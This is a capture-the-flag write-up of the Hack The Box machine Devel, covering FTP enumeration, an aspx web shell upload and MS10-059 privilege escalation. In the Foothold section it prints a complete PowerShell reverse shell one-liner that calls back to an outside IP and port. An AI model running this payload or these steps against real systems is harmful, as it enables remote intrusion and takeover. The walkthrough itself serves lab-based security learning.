Hack The Box: Devel write-up

Devel is an easy Windows machine from HackTheBox. It requires knowledge of FTP and Windows kernel exploits to hack.

Enumeration

Nmap to start.

Figure 1 – nmap output

Only ports 80 and 21 were open. Port 21 is obviously FTP and the nmap scan said anonymous access was allowed, so I started there.

Figure 2 – FTP root directory

Foothold

The contents of the root FTP directory looked like the standard IIS root folder contents and I validated this by opening http://10.129.66.3 in a browser. Therefore I was fairly confident that if I could upload a file here I would be able to execute it from the browser, so I uploaded an aspx shell and visited the browser to check.

Figure 3 – Uploading aspx shell via FTP
Figure 4 – Executing shell in browser

My shell was successful, so the next step was to use it to launch an interactive shell back to my terminal. I did this with the PowerShell command below:

powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.10.14.8’,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

Figure 5 – Gaining foothold

Privilege escalation

Now that I had a foothold I started to work on privilege escalation. I used Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to find any easy kernel exploits. The output is below, filtered for only exploits that allowed for privilege escalation.

Figure 6 – Windows Exploit Suggester output

I started at the top of the list and worked my way down the exploits. Eventually, I found MS10-059 worked with a pre-compiled exploit available from SecWiki (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059). I used FTP to upload the exploit to the victim machine, with the important step of first switching to binary transfer.

Figure 7 – Uploading MS10-059

From my low privilege shell I executed the exploit to spawn a privileged shell back to my Kali machine.

Figure 8 – Privileged shell using MS10-059

Leave a Reply